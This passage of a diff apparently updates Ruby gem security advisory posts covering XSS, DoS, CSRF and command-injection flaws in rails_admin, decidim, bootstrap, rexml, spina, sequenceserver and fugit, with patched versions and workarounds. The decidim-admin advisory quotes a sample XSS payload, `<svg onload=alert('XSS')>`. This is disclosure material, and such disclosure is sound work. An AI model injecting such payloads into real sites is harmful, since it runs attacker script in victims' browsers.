+    or [2.3.0](https://rubygems.org/gems/rails_admin/versions/2.3.0).
+
+    ### Workarounds
+    1. Copy the index view (located under the path
+       `app/views/rails_admin/main/index.html.erb`) from the RailsAdmin
+       version you use, and place it into your application by using
+       the same path.
+
+    2. Open the view file by an editor, and remove `strip_tags` from
+       the title attribute (as shown in GHSA advisory below).
+
+    **Note:** The view file created by this needs to be removed after
+    upgrading RailsAdmin afterwards, unless this old view continue to
+    be used. Only do this if you can't upgrade RailsAdmin now for a reason.
+
+    ### References
+    https://owasp.org/www-community/attacks/xss/
+    https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-strip_tags
+  cvss_v3: 6.8
+  patched_versions:
+  - "~> 2.3.0"
+  - ">= 3.1.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-39308
+    - https://github.com/railsadminteam/rails_admin/security/advisories/GHSA-8qgm-g2vv-vwvc
+    - https://github.com/railsadminteam/rails_admin/issues/3686
+    - https://github.com/railsadminteam/rails_admin/commit/b5a287d82e2cbd1737a1a01e11ede2911cce7fef
+    - https://github.com/railsadminteam/rails_admin/commit/d84b39884059c4ed50197cec8522cca029a17673
+    - https://rubygems.org/gems/rails_admin/versions/2.3.0
+    - https://rubygems.org/gems/rails_admin/versions/3.1.3
+    - https://github.com/advisories/GHSA-8qgm-g2vv-vwvc
+---
diff --git a/advisories/_posts/2024-07-10-CVE-2024-27090.md b/advisories/_posts/2024-07-10-CVE-2024-27090.md
index dd1cbc66..37372ecb 100644
--- a/advisories/_posts/2024-07-10-CVE-2024-27090.md
+++ b/advisories/_posts/2024-07-10-CVE-2024-27090.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2024-27090 (decidim): Decidim vulnerable to data disclosure through the
-  embed feature'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2024-27090
-  ghsa: qcj6-vxwx-4rqv
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-qcj6-vxwx-4rqv
-  title: Decidim vulnerable to data disclosure through the embed feature
-  date: 2024-07-10
-  description: |
-    ### Impact
-    If an attacker can infer the slug or URL of an unpublished or private
-    resource, and this resource can be embedded (such as a Participatory
-    Process, an Assembly, a Proposal, a Result, etc), then some data of
-    this resource could be accessed.
-
-    ### Patches
-
-    Version 0.27.6
-
-    https://github.com/decidim/decidim/commit/1756fa639ef393ca8e8bb16221cab2e2e7875705
-
-    ### Workarounds
-
-    Disallow access through your web server to the URLs finished with `/embed.html`
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 0.27.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-27090
-    - https://github.com/decidim/decidim/security/advisories/GHSA-qcj6-vxwx-4rqv
-    - https://github.com/decidim/decidim/pull/12528
-    - https://github.com/decidim/decidim/commit/1756fa639ef393ca8e8bb16221cab2e2e7875705
-    - https://github.com/decidim/decidim/releases/tag/v0.27.6
-    - https://github.com/advisories/GHSA-qcj6-vxwx-4rqv
----
+---
+layout: advisory
+title: 'CVE-2024-27090 (decidim): Decidim vulnerable to data disclosure through the
+  embed feature'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2024-27090
+  ghsa: qcj6-vxwx-4rqv
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-qcj6-vxwx-4rqv
+  title: Decidim vulnerable to data disclosure through the embed feature
+  date: 2024-07-10
+  description: |
+    ### Impact
+    If an attacker can infer the slug or URL of an unpublished or private
+    resource, and this resource can be embedded (such as a Participatory
+    Process, an Assembly, a Proposal, a Result, etc), then some data of
+    this resource could be accessed.
+
+    ### Patches
+
+    Version 0.27.6
+
+    https://github.com/decidim/decidim/commit/1756fa639ef393ca8e8bb16221cab2e2e7875705
+
+    ### Workarounds
+
+    Disallow access through your web server to the URLs finished with `/embed.html`
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 0.27.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-27090
+    - https://github.com/decidim/decidim/security/advisories/GHSA-qcj6-vxwx-4rqv
+    - https://github.com/decidim/decidim/pull/12528
+    - https://github.com/decidim/decidim/commit/1756fa639ef393ca8e8bb16221cab2e2e7875705
+    - https://github.com/decidim/decidim/releases/tag/v0.27.6
+    - https://github.com/advisories/GHSA-qcj6-vxwx-4rqv
+---
diff --git a/advisories/_posts/2024-07-10-CVE-2024-27095.md b/advisories/_posts/2024-07-10-CVE-2024-27095.md
index ddd52c6c..0b7e74be 100644
--- a/advisories/_posts/2024-07-10-CVE-2024-27095.md
+++ b/advisories/_posts/2024-07-10-CVE-2024-27095.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2024-27095 (decidim-admin): Decidim cross-site scripting (XSS) in the
-  admin panel'
-comments: false
-categories:
-- decidim-admin
-advisory:
-  gem: decidim-admin
-  cve: 2024-27095
-  ghsa: 529p-jj47-w3m3
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-529p-jj47-w3m3
-  title: Decidim cross-site scripting (XSS) in the admin panel
-  date: 2024-07-10
-  description: |
-    ### Impact
-
-    The admin panel is subject to potential XSS attach in case the attacker
-    manages to modify some records being uploaded to the server.
-
-    The attacker is able to change  e.g. to `<svg onload=alert('XSS')>`
-    if they know how to craft these requests themselves. And then enter
-    the returned blob ID to the form inputs manually by modifying the
-    edit page source.
-
-    ### Patches
-
-    Available in versions 0.27.6 and 0.28.1.
-
-    ### Workarounds
-
-    Review the user accounts that have access to the admin panel (i.e.
-    general Administrators, and participatory space's Administrators)
-    and remove access to them if they don't need it.
-
-    ### References
-
-    OWASP ASVS v4.0.3-5.1.3
-  cvss_v3: 5.4
-  patched_versions:
-  - "~> 0.27.6"
-  - ">= 0.28.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-27095
-    - https://github.com/decidim/decidim/security/advisories/GHSA-529p-jj47-w3m3
-    - https://github.com/decidim/decidim/releases/tag/v0.27.6
-    - https://github.com/decidim/decidim/releases/tag/v0.28.1
-    - https://github.com/advisories/GHSA-529p-jj47-w3m3
----
+---
+layout: advisory
+title: 'CVE-2024-27095 (decidim-admin): Decidim cross-site scripting (XSS) in the
+  admin panel'
+comments: false
+categories:
+- decidim-admin
+advisory:
+  gem: decidim-admin
+  cve: 2024-27095
+  ghsa: 529p-jj47-w3m3
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-529p-jj47-w3m3
+  title: Decidim cross-site scripting (XSS) in the admin panel
+  date: 2024-07-10
+  description: |
+    ### Impact
+
+    The admin panel is subject to potential XSS attach in case the attacker
+    manages to modify some records being uploaded to the server.
+
+    The attacker is able to change  e.g. to `<svg onload=alert('XSS')>`
+    if they know how to craft these requests themselves. And then enter
+    the returned blob ID to the form inputs manually by modifying the
+    edit page source.
+
+    ### Patches
+
+    Available in versions 0.27.6 and 0.28.1.
+
+    ### Workarounds
+
+    Review the user accounts that have access to the admin panel (i.e.
+    general Administrators, and participatory space's Administrators)
+    and remove access to them if they don't need it.
+
+    ### References
+
+    OWASP ASVS v4.0.3-5.1.3
+  cvss_v3: 5.4
+  patched_versions:
+  - "~> 0.27.6"
+  - ">= 0.28.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-27095
+    - https://github.com/decidim/decidim/security/advisories/GHSA-529p-jj47-w3m3
+    - https://github.com/decidim/decidim/releases/tag/v0.27.6
+    - https://github.com/decidim/decidim/releases/tag/v0.28.1
+    - https://github.com/advisories/GHSA-529p-jj47-w3m3
+---
diff --git a/advisories/_posts/2024-07-10-CVE-2024-32469.md b/advisories/_posts/2024-07-10-CVE-2024-32469.md
index df09ec38..1a557900 100644
--- a/advisories/_posts/2024-07-10-CVE-2024-32469.md
+++ b/advisories/_posts/2024-07-10-CVE-2024-32469.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2024-32469 (decidim): Decidim cross-site scripting (XSS) in the pagination'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2024-32469
-  ghsa: 7cx8-44pc-xv3q
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-7cx8-44pc-xv3q
-  title: Decidim cross-site scripting (XSS) in the pagination
-  date: 2024-07-10
-  description: |
-    ### Impact
-
-    The pagination feature used in searches and filters is subject to
-    potential XSS attack through a malformed URL using the GET parameter
-    `per_page`.
-
-    ### Patches
-
-    Patched in version 0.27.6 and 0.28.1
-
-    ### References
-
-    OWASP ASVS v4.0.3-5.1.3
-
-    ### Credits
-
-    This issue was discovered in a security audit organized by the
-    [mitgestalten Partizipationsbüro](https://partizipationsbuero.at/)
-    and funded by [netidee](https://www.netidee.at/) against Decidim
-    done during April 2024. The security audit was implemented by
-    [AIT Austrian Institute of Technology GmbH](https://www.ait.ac.at/),
-  cvss_v3: 7.1
-  patched_versions:
-  - "~> 0.27.6"
-  - ">= 0.28.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-32469
-    - https://github.com/decidim/decidim/security/advisories/GHSA-7cx8-44pc-xv3q
-    - https://github.com/decidim/decidim/releases/tag/v0.27.6
-    - https://github.com/decidim/decidim/releases/tag/v0.28.1
-    - https://github.com/advisories/GHSA-7cx8-44pc-xv3q
----
+---
+layout: advisory
+title: 'CVE-2024-32469 (decidim): Decidim cross-site scripting (XSS) in the pagination'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2024-32469
+  ghsa: 7cx8-44pc-xv3q
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-7cx8-44pc-xv3q
+  title: Decidim cross-site scripting (XSS) in the pagination
+  date: 2024-07-10
+  description: |
+    ### Impact
+
+    The pagination feature used in searches and filters is subject to
+    potential XSS attack through a malformed URL using the GET parameter
+    `per_page`.
+
+    ### Patches
+
+    Patched in version 0.27.6 and 0.28.1
+
+    ### References
+
+    OWASP ASVS v4.0.3-5.1.3
+
+    ### Credits
+
+    This issue was discovered in a security audit organized by the
+    [mitgestalten Partizipationsbüro](https://partizipationsbuero.at/)
+    and funded by [netidee](https://www.netidee.at/) against Decidim
+    done during April 2024. The security audit was implemented by
+    [AIT Austrian Institute of Technology GmbH](https://www.ait.ac.at/),
+  cvss_v3: 7.1
+  patched_versions:
+  - "~> 0.27.6"
+  - ">= 0.28.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32469
+    - https://github.com/decidim/decidim/security/advisories/GHSA-7cx8-44pc-xv3q
+    - https://github.com/decidim/decidim/releases/tag/v0.27.6
+    - https://github.com/decidim/decidim/releases/tag/v0.28.1
+    - https://github.com/advisories/GHSA-7cx8-44pc-xv3q
+---
diff --git a/advisories/_posts/2024-07-11-CVE-2024-6531.md b/advisories/_posts/2024-07-11-CVE-2024-6531.md
index 84ffca74..cc45dd93 100644
--- a/advisories/_posts/2024-07-11-CVE-2024-6531.md
+++ b/advisories/_posts/2024-07-11-CVE-2024-6531.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2024-6531 (bootstrap): Bootstrap Cross-Site Scripting (XSS) vulnerability'
-comments: false
-categories:
-- bootstrap
-advisory:
-  gem: bootstrap
-  cve: 2024-6531
-  ghsa: vc8w-jr9v-vj7f
-  url: https://github.com/advisories/GHSA-vc8w-jr9v-vj7f
-  title: Bootstrap Cross-Site Scripting (XSS) vulnerability
-  date: 2024-07-11
-  description: |
-    A vulnerability has been identified in Bootstrap that exposes users
-    to Cross-Site Scripting (XSS) attacks. The issue is present in the
-    carousel component, where the data-slide and data-slide-to attributes
-    can be exploited through the href attribute of an <a> tag due to
-    inadequate sanitization. This vulnerability could potentially enable
-    attackers to execute arbitrary JavaScript within the victim's browser.
-  cvss_v3: 6.4
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - "> 4.6.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-6531
-    - https://www.herodevs.com/vulnerability-directory/cve-2024-6531
-    - https://github.com/advisories/GHSA-vc8w-jr9v-vj7f
----
+---
+layout: advisory
+title: 'CVE-2024-6531 (bootstrap): Bootstrap Cross-Site Scripting (XSS) vulnerability'
+comments: false
+categories:
+- bootstrap
+advisory:
+  gem: bootstrap
+  cve: 2024-6531
+  ghsa: vc8w-jr9v-vj7f
+  url: https://github.com/advisories/GHSA-vc8w-jr9v-vj7f
+  title: Bootstrap Cross-Site Scripting (XSS) vulnerability
+  date: 2024-07-11
+  description: |
+    A vulnerability has been identified in Bootstrap that exposes users
+    to Cross-Site Scripting (XSS) attacks. The issue is present in the
+    carousel component, where the data-slide and data-slide-to attributes
+    can be exploited through the href attribute of an <a> tag due to
+    inadequate sanitization. This vulnerability could potentially enable
+    attackers to execute arbitrary JavaScript within the victim's browser.
+  cvss_v3: 6.4
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "> 4.6.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-6531
+    - https://www.herodevs.com/vulnerability-directory/cve-2024-6531
+    - https://github.com/advisories/GHSA-vc8w-jr9v-vj7f
+---
diff --git a/advisories/_posts/2024-07-16-CVE-2024-39908.md b/advisories/_posts/2024-07-16-CVE-2024-39908.md
index 5e4c4b03..78373612 100644
--- a/advisories/_posts/2024-07-16-CVE-2024-39908.md
+++ b/advisories/_posts/2024-07-16-CVE-2024-39908.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2024-39908 (rexml): DoS in REXML'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2024-39908
-  ghsa: 4xqq-m2hx-25v8
-  url: https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8
-  title: DoS in REXML
-  date: 2024-07-16
-  description: |
-    There is a DoS vulnerability in REXML gem. This vulnerability has
-    been assigned the CVE identifier CVE-2024-39908. We strongly
-    recommend upgrading the REXML gem.
-
-    ## Details
-
-    When it parses an XML that has many specific characters such as
-    <, 0 and %>. REXML gem may take long time.
-
-    Please update REXML gem to version 3.3.2 or later.
-
-    ## Affected versions
-
-    REXML gem 3.3.2 or prior
-
-    ## Credits
-
-    Thanks to mprogrammer for discovering this issue.
-
-    ## History
-
-    Originally published at 2024-07-16 03:00:00 (UTC)
-  cvss_v3: 4.3
-  patched_versions:
-  - ">= 3.3.2"
-  related:
-    ghsa:
-    - https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh
-    url:
-    - https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908
-    - https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8
----
+---
+layout: advisory
+title: 'CVE-2024-39908 (rexml): DoS in REXML'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2024-39908
+  ghsa: 4xqq-m2hx-25v8
+  url: https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8
+  title: DoS in REXML
+  date: 2024-07-16
+  description: |
+    There is a DoS vulnerability in REXML gem. This vulnerability has
+    been assigned the CVE identifier CVE-2024-39908. We strongly
+    recommend upgrading the REXML gem.
+
+    ## Details
+
+    When it parses an XML that has many specific characters such as
+    <, 0 and %>. REXML gem may take long time.
+
+    Please update REXML gem to version 3.3.2 or later.
+
+    ## Affected versions
+
+    REXML gem 3.3.2 or prior
+
+    ## Credits
+
+    Thanks to mprogrammer for discovering this issue.
+
+    ## History
+
+    Originally published at 2024-07-16 03:00:00 (UTC)
+  cvss_v3: 4.3
+  patched_versions:
+  - ">= 3.3.2"
+  related:
+    ghsa:
+    - https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh
+    url:
+    - https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908
+    - https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8
+---
diff --git a/advisories/_posts/2024-07-25-CVE-2024-7106.md b/advisories/_posts/2024-07-25-CVE-2024-7106.md
index e6b5be64..10acea22 100644
--- a/advisories/_posts/2024-07-25-CVE-2024-7106.md
+++ b/advisories/_posts/2024-07-25-CVE-2024-7106.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2024-7106 (spina): Cross-Site Request Forgery in Spina'
-comments: false
-categories:
-- spina
-advisory:
-  gem: spina
-  cve: 2024-7106
-  ghsa: wqw3-p83g-r24v
-  url: https://github.com/advisories/GHSA-wqw3-p83g-r24v
-  title: Cross-Site Request Forgery in Spina
-  date: 2024-07-25
-  description: |
-    A vulnerability classified as problematic was found in
-    Spina CMS 2.18.0.
-
-    Affected by this vulnerability is an unknown functionality
-    of the file /admin/media_folders.
-
-    The manipulation leads to cross-site request forgery.
-    The attack can be launched remotely.
-
-    The exploit has been disclosed to the public and may be used.
-
-    The associated identifier of this vulnerability is VDB-272431.
-
-    NOTE: The vendor was contacted early about this disclosure
-    but did not respond in any way.
-  cvss_v2: 5.0
-  cvss_v3: 4.3
-  cvss_v4: 6.9
-  notes: Never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-7106
-    - https://github.com/topsky979/Security-Collections/blob/main/cve3/README.md
-    - https://vuldb.com/?ctiid.272431
-    - https://vuldb.com/?id.272431
-    - https://vuldb.com/?submit.376769
-    - https://github.com/advisories/GHSA-wqw3-p83g-r24v
----
+---
+layout: advisory
+title: 'CVE-2024-7106 (spina): Cross-Site Request Forgery in Spina'
+comments: false
+categories:
+- spina
+advisory:
+  gem: spina
+  cve: 2024-7106
+  ghsa: wqw3-p83g-r24v
+  url: https://github.com/advisories/GHSA-wqw3-p83g-r24v
+  title: Cross-Site Request Forgery in Spina
+  date: 2024-07-25
+  description: |
+    A vulnerability classified as problematic was found in
+    Spina CMS 2.18.0.
+
+    Affected by this vulnerability is an unknown functionality
+    of the file /admin/media_folders.
+
+    The manipulation leads to cross-site request forgery.
+    The attack can be launched remotely.
+
+    The exploit has been disclosed to the public and may be used.
+
+    The associated identifier of this vulnerability is VDB-272431.
+
+    NOTE: The vendor was contacted early about this disclosure
+    but did not respond in any way.
+  cvss_v2: 5.0
+  cvss_v3: 4.3
+  cvss_v4: 6.9
+  notes: Never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-7106
+    - https://github.com/topsky979/Security-Collections/blob/main/cve3/README.md
+    - https://vuldb.com/?ctiid.272431
+    - https://vuldb.com/?id.272431
+    - https://vuldb.com/?submit.376769
+    - https://github.com/advisories/GHSA-wqw3-p83g-r24v
+---
diff --git a/advisories/_posts/2024-08-01-CVE-2024-41123.md b/advisories/_posts/2024-08-01-CVE-2024-41123.md
index f26e4739..8c6ee347 100644
--- a/advisories/_posts/2024-08-01-CVE-2024-41123.md
+++ b/advisories/_posts/2024-08-01-CVE-2024-41123.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2024-41123 (rexml): DoS vulnerabilities in REXML'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2024-41123
-  ghsa: r55c-59qm-vjw6
-  url: https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123
-  title: DoS vulnerabilities in REXML
-  date: 2024-08-01
-  description: |
-    There are some DoS vulnerabilities in REXML gem.
-    These vulnerabilities have been assigned the CVE identifier
-    CVE-2024-41123. We strongly recommend upgrading the REXML gem.
-
-    ## Details
-
-    When parsing an XML document that has many specific characters such
-    as whitespace character, >] and ]>, REXML gem may take long time.
-
-    Please update REXML gem to version 3.3.3 or later.
-
-    ## Affected versions
-
-    * REXML gem 3.3.2 or prior
-
-    ## Credits
-
-    Thanks to mprogrammer and scyoon for discovering these issues.
-
-    ## History
-
-    Originally published at 2024-08-01 03:00:00 (UTC)
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 3.3.3"
-  related:
-    url:
-    - https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123
----
+---
+layout: advisory
+title: 'CVE-2024-41123 (rexml): DoS vulnerabilities in REXML'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2024-41123
+  ghsa: r55c-59qm-vjw6
+  url: https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123
+  title: DoS vulnerabilities in REXML
+  date: 2024-08-01
+  description: |
+    There are some DoS vulnerabilities in REXML gem.
+    These vulnerabilities have been assigned the CVE identifier
+    CVE-2024-41123. We strongly recommend upgrading the REXML gem.
+
+    ## Details
+
+    When parsing an XML document that has many specific characters such
+    as whitespace character, >] and ]>, REXML gem may take long time.
+
+    Please update REXML gem to version 3.3.3 or later.
+
+    ## Affected versions
+
+    * REXML gem 3.3.2 or prior
+
+    ## Credits
+
+    Thanks to mprogrammer and scyoon for discovering these issues.
+
+    ## History
+
+    Originally published at 2024-08-01 03:00:00 (UTC)
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 3.3.3"
+  related:
+    url:
+    - https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123
+---
diff --git a/advisories/_posts/2024-08-01-CVE-2024-41946.md b/advisories/_posts/2024-08-01-CVE-2024-41946.md
index 93c6131b..ec456e19 100644
--- a/advisories/_posts/2024-08-01-CVE-2024-41946.md
+++ b/advisories/_posts/2024-08-01-CVE-2024-41946.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2024-41946 (rexml): DoS vulnerabilities in REXML'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2024-41946
-  ghsa: 5866-49gr-22v4
-  url: https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946
-  title: DoS vulnerabilities in REXML
-  date: 2024-08-01
-  description: |
-    There is a DoS vulnerability in REXML gem.
-    This vulnerability has been assigned the CVE identifier
-    CVE-2024-41946. We strongly recommend upgrading the REXML gem.
-
-    ## Details
-
-    When parsing an XML that has many entity expansions with SAX2 or
-    pull parser API, REXML gem may take long time.
-
-    Please update REXML gem to version 3.3.3 or later.
-
-    ## Affected versions
-
-    * REXML gem 3.3.2 or prior
-
-    ## Credits
-
-    Thanks to NAITOH Jun for discovering and fixing this issue.
-
-    ## History
-
-    Originally published at 2024-08-01 03:00:00 (UTC)
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 3.3.3"
-  related:
-    url:
-    - https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946
----
+---
+layout: advisory
+title: 'CVE-2024-41946 (rexml): DoS vulnerabilities in REXML'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2024-41946
+  ghsa: 5866-49gr-22v4
+  url: https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946
+  title: DoS vulnerabilities in REXML
+  date: 2024-08-01
+  description: |
+    There is a DoS vulnerability in REXML gem.
+    This vulnerability has been assigned the CVE identifier
+    CVE-2024-41946. We strongly recommend upgrading the REXML gem.
+
+    ## Details
+
+    When parsing an XML that has many entity expansions with SAX2 or
+    pull parser API, REXML gem may take long time.
+
+    Please update REXML gem to version 3.3.3 or later.
+
+    ## Affected versions
+
+    * REXML gem 3.3.2 or prior
+
+    ## Credits
+
+    Thanks to NAITOH Jun for discovering and fixing this issue.
+
+    ## History
+
+    Originally published at 2024-08-01 03:00:00 (UTC)
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 3.3.3"
+  related:
+    url:
+    - https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946
+---
diff --git a/advisories/_posts/2024-08-13-CVE-2024-42360.md b/advisories/_posts/2024-08-13-CVE-2024-42360.md
index 9bdd4545..72bfe30e 100644
--- a/advisories/_posts/2024-08-13-CVE-2024-42360.md
+++ b/advisories/_posts/2024-08-13-CVE-2024-42360.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2024-42360 (sequenceserver): Command Injection in sequenceserver gem'
-comments: false
-categories:
-- sequenceserver
-advisory:
-  gem: sequenceserver
-  cve: 2024-42360
-  ghsa: qv32-5wm2-p32h
-  url: https://github.com/wurmlab/sequenceserver/security/advisories/GHSA-qv32-5wm2-p32h
-  title: Command Injection in sequenceserver gem
-  date: 2024-08-13
-  description: |
-    ### Impact
-
-    Several HTTP endpoints did not properly sanitize user input
-    and/or query parameters. This could be exploited to inject
-    and run unwanted shell commands
-
-    ### Patches
-
-    Fixed in 3.1.2
-
-    ### Workarounds
-
-    No known workarounds
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 3.1.2"
-  related:
-    url:
-    - https://github.com/wurmlab/sequenceserver/security/advisories/GHSA-qv32-5wm2-p32h
-    - https://github.com/wurmlab/sequenceserver/commit/457e52709f7f9ed2fceed59b3db564cb50785dba
-    - https://github.com/advisories/GHSA-qv32-5wm2-p32h
----
+---
+layout: advisory
+title: 'CVE-2024-42360 (sequenceserver): Command Injection in sequenceserver gem'
+comments: false
+categories:
+- sequenceserver
+advisory:
+  gem: sequenceserver
+  cve: 2024-42360
+  ghsa: qv32-5wm2-p32h
+  url: https://github.com/wurmlab/sequenceserver/security/advisories/GHSA-qv32-5wm2-p32h
+  title: Command Injection in sequenceserver gem
+  date: 2024-08-13
+  description: |
+    ### Impact
+
+    Several HTTP endpoints did not properly sanitize user input
+    and/or query parameters. This could be exploited to inject
+    and run unwanted shell commands
+
+    ### Patches
+
+    Fixed in 3.1.2
+
+    ### Workarounds
+
+    No known workarounds
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 3.1.2"
+  related:
+    url:
+    - https://github.com/wurmlab/sequenceserver/security/advisories/GHSA-qv32-5wm2-p32h
+    - https://github.com/wurmlab/sequenceserver/commit/457e52709f7f9ed2fceed59b3db564cb50785dba
+    - https://github.com/advisories/GHSA-qv32-5wm2-p32h
+---
diff --git a/advisories/_posts/2024-08-19-CVE-2024-43380.md b/advisories/_posts/2024-08-19-CVE-2024-43380.md
index 9d966070..2cd4be03 100644
--- a/advisories/_posts/2024-08-19-CVE-2024-43380.md
+++ b/advisories/_posts/2024-08-19-CVE-2024-43380.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2024-43380 (fugit): fugit parse and parse_nat stall on lengthy input'
-comments: false
-categories:
-- fugit
-advisory:
-  gem: fugit
-  cve: 2024-43380
-  ghsa: 2m96-52r3-2f3g
-  url: https://github.com/floraison/fugit/security/advisories/GHSA-2m96-52r3-2f3g
-  title: fugit parse and parse_nat stall on lengthy input
-  date: 2024-08-19
-  description: |
-    ### Impact
-
-    The fugit "natural" parser, that turns "every wednesday at 5pm" into
-    "0 17 * * 3", accepted any length of input and went on attempting to
-    parse it, not returning promptly, as expected. The parse call could
-    hold the thread with no end in sight.
-
-    Fugit dependents that do not check (user) input length for
-    plausability are impacted.
-
-    ### Patches
-
-    Problem was reported in #104 and the fix was released in
-    [fugit 1.11.1](https://rubygems.org/gems/fugit/versions/1.11.1)
-
-    ### Workarounds
-
-    By making sure that `Fugit.parse(s)`, `Fugit.do_parse(s)`,
-    `Fugit.parse_nat(s)`, `Fugit.do_parse_nat(s)`, `Fugit::Nat.parse(s)`,
-    and `Fugit::Nat.do_parse(s)` are not fed strings too long.
-    1000 chars feels ok, while 10_000 chars makes it stall.
-
-    In fewer words, making sure those fugit methods are not fed
-    unvetted input strings.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 1.11.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-43380
-    - https://github.com/floraison/fugit/security/advisories/GHSA-2m96-52r3-2f3g
-    - https://github.com/floraison/fugit/issues/104
-    - https://github.com/floraison/fugit/commit/ad2c1c9c737213d585fff0b51c927d178b2c05a5
-    - https://github.com/advisories/GHSA-2m96-52r3-2f3g
----
+---
+layout: advisory
+title: 'CVE-2024-43380 (fugit): fugit parse and parse_nat stall on lengthy input'
+comments: false
+categories:
+- fugit
+advisory:
+  gem: fugit
+  cve: 2024-43380
+  ghsa: 2m96-52r3-2f3g
+  url: https://github.com/floraison/fugit/security/advisories/GHSA-2m96-52r3-2f3g
+  title: fugit parse and parse_nat stall on lengthy input
+  date: 2024-08-19
+  description: |
+    ### Impact
+
+    The fugit "natural" parser, that turns "every wednesday at 5pm" into
+    "0 17 * * 3", accepted any length of input and went on attempting to
+    parse it, not returning promptly, as expected. The parse call could
+    hold the thread with no end in sight.
+
+    Fugit dependents that do not check (user) input length for
+    plausability are impacted.
+
+    ### Patches
+
+    Problem was reported in #104 and the fix was released in
+    [fugit 1.11.1](https://rubygems.org/gems/fugit/versions/1.11.1)
+
+    ### Workarounds
+
+    By making sure that `Fugit.parse(s)`, `Fugit.do_parse(s)`,
+    `Fugit.parse_nat(s)`, `Fugit.do_parse_nat(s)`, `Fugit::Nat.parse(s)`,
+    and `Fugit::Nat.do_parse(s)` are not fed strings too long.
+    1000 chars feels ok, while 10_000 chars makes it stall.
+
+    In fewer words, making sure those fugit methods are not fed
+    unvetted input strings.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 1.11.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43380
+    - https://github.com/floraison/fugit/security/advisories/GHSA-2m96-52r3-2f3g
+    - https://github.com/floraison/fugit/issues/104
+    - https://github.com/floraison/fugit/commit/ad2c1c9c737213d585fff0b51c927d178b2c05a5
+    - https://github.com/advisories/GHSA-2m96-52r3-2f3g
+---
diff --git a/advisories/_posts/2024-08-21-CVE-2024-43407.md b/advisories/_posts/2024-08-21-CVE-2024-43407.md
index bc891d3d..372122ec 100644
--- a/advisories/_posts/2024-08-21-CVE-2024-43407.md
+++ b/advisories/_posts/2024-08-21-CVE-2024-43407.md
